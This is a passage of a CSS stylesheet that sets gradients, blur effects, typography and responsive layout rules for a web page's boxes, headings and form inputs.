  background: linear-gradient(
    135.15deg,
    #ae80dc 1.17%,
    #dc83c3 31.88%,
    #8084dc 65.46%
  );
}
.ysbgtcbox::after {
  content: "";
  position: absolute;
  border-radius: 50%;
  background: linear-gradient(
    135.15deg,
    #ae80dc 1.17%,
    #dc83c3 31.88%,
    #8084dc 65.46%
  );
  right: -194px;
  bottom: -181px;
  width: 390px;
  height: 390px;
  filter: blur(160px);
  opacity: 0.6;
}
.ysbgtcbox > img {
  width: 1.5rem;
  position: absolute;
  top: 1.5rem;
  right: 1.5rem;
  cursor: pointer;
}
.ysbgtcbtop {
  font-family: "Poppins";
  font-size: 1.125rem;
  line-height: 1.75rem;
  color: white;
  text-align: center;
  padding: 1.25rem;
  border-bottom: 1px solid rgb(90, 90, 89);
}
.ysbgtcnone {
  display: none;
}
.ymainhy .ysconf > h1 {
  color: #000;
}
.ymainhy .yscbltinpxy {
  box-shadow: 0 8px 32px #0000001a;
  background: #f7f7f8;
}
.ymainhy .yscbltinpxs {
  box-shadow: 0 8px 32px #0000001a;
  background: #f7f7f8;
}
@media (max-width: 1250px) {
  .yscon {
    height: auto;
    padding-top: 10rem;
  }
  .ystabayfy {
    width: 40% !important;
  }
  .ystabacry {
    width: 60% !important;
  }
  .ystabayft {
    width: 32.8% !important;
  }
  .ystabacrt {
    width: 67.2% !important;
  }
  .ystabacrtop > input {
    width: 65%;
  }
  .ystabacrtop > button {
    width: 35%;
    font-size: 0.75rem;
    height: 1.5rem;
  }
  .yscbrbdtf > span {
    font-size: 0.875rem;
    line-height: 1.125rem;
  }
  .yscbrbdtf > p {
    font-size: 0.875rem;
    line-height: 1.125rem;
  }
  .yscbrbend {
    height: 3.17rem;
  }
  .yscbrbendh {
    height: 11.175rem;
  }
  .yscbrbdy > p {
    font-size: 0.875rem;
    line-height: 1.125rem;
  }
  .yscon > h1 {
    font-size: 2.5rem;
    line-height: 3rem;
  }
  .ysconf > h1 {
    font-size: 2.5rem;
    line-height: 3rem;
  }
  .yscon > p {
    font-size: 1rem;
    line-height: 1.5rem;
    margin-bottom: 1.25rem;
  }
  .ysconf > p {
    font-size: 1rem;
    line-height: 1.5rem;
    margin-bottom: 1.25rem;
  }
  .yscbox {
    display: block;
    width: 100%;
    height: auto;
    padding: 0rem;
  }
  .yscblcon {
    width: 100%;
  }
  .yscbl {
    padding: 1rem;
  }
  .yscbltop > h1 {
    font-size: 1.5rem;
    line-height: 2rem;
  }
  .yscblk {
    display: block;
    height: auto;
  }
  .yscblk > div:nth-child(1) {
    margin-bottom: 0.75rem;
  }
  .yscblk > div:nth-child(2) {
    margin-bottom: 0.75rem;
  }
  .yscblkfb {
    width: 100%;
  }
  .yscblkd {
    margin-top: -0.5rem;
  }
  .yscbr {
    padding: 1rem;
    width: 100%;
  }
  .yscbrlg {
    display: none;
  }
  .yscbrbinp > input {
    padding: 0 1.25rem;
  }
  .yscbltinpxt {
    height: auto;
  }
  .yscbltinpxs {
    flex-direction: column;
    justify-content: center;
  }
  .ysbgtcbox {
    width: 95%;
  }
  .ysbgtcbox::before {
    top: -100px;
    left: -100px;
    width: 200px;
    height: 200px;
    opacity: 0.6;
    filter: blur(278.261px);
    content: "";
    position: absolute;
    border-radius: 50%;
    background: linear-gradient(
      135.15deg,
      #ae80dc 1.17%,
      #dc83c3 31.88%,
      #8084dc 65.46%
    );
  }
  .yscbltinpxy::before {
    top: -100px;
    left: -100px;
    width: 200px;
    height: 200px;
    opacity: 0.6;
    filter: blur(278.261px);
    content: "";
    position: absolute;
    border-radius: 50%;
    background: linear-gradient(
      135.15deg,
      #ae80dc 1.17%,
      #dc83c3 31.88%,
      #8084dc 65.46%
    );
  }
}
</style>
